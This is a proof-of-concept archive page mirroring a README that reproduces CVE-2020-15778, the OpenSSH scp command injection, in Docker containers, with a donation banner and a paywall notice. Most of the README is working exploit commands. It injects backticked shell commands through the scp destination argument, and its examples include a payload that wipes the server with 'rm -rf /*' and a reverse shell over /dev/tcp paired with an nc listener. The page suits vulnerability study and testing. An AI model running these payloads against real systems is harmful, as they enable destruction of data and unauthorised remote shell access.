Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1359 CNY

100%

CVE-2020-15778 PoC — OpenSSH 操作系统命令注入漏洞

Source
Associated Vulnerability
Title: OpenSSH 操作系统命令注入漏洞 (CVE-2020-15778)
Description:scp in OpenSSH through 8.3p1 allows command injection in the scp.c toremote function, as demonstrated by backtick characters in the destination argument. NOTE: the vendor reportedly has stated that they intentionally omit validation of "anomalous argument transfers" because that could "stand a great chance of breaking existing workflows."
Readme
# CVE-2020-15778

## Introduction
This repo reproduces [CVE-2020-15778](https://nvd.nist.gov/vuln/detail/CVE-2020-15778).

## Steps
1. Build the docker images for scp server and client
```bash
cd client
docker build -t client-cve .
```
```bash
cd server
docker build -t server-cve .
```

2. Spin up the scp server in container.
```bash
docker run -d -P --name scp-server server-cve
```
Retrieve the internal IP address of the scp server by
```bash
docker inspect --format='{{range .NetworkSettings.Networks}}{{.IPAddress}}{{end}}' scp-server
```

3. Run the client in container.
```bash
docker run --name scp-client -i -t client-cve
```

4. Inject your own shell command to scp server by call scp command in the client.

In client terminal, run
```bash
scp nil.txt root@<internal IP of scp server>:'`your command`/tmp'
```
The password is "PASSWORD".

## Examples
Here're some examples for this exploit.

1. Delete everything in the server to crash it.
```bash
scp nil.txt root@<internal IP of scp server>:'`rm -rf /*`/tmp'
```

2. Reflect the bash of the scp server into the client (mimic ssh).

Listen to a port on client machine.
```bash
nc -lvvp 8080
```

Use scp to force the server mapping the interactive bash into the client machine.
```bash
scp nil.txt root@<internal IP of scp client>:'`bash -i >& /dev/tcp/<internal IP of scp client>/8080 0>& 1`/tmp'
```

The client IP address can be retrieved by
```bash
docker inspect --format='{{range .NetworkSettings.Networks}}{{.IPAddress}}{{end}}' scp-client
```
File Snapshot

Log in to view the POC file snapshot cached by Shenlong Bot

Log in to view
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →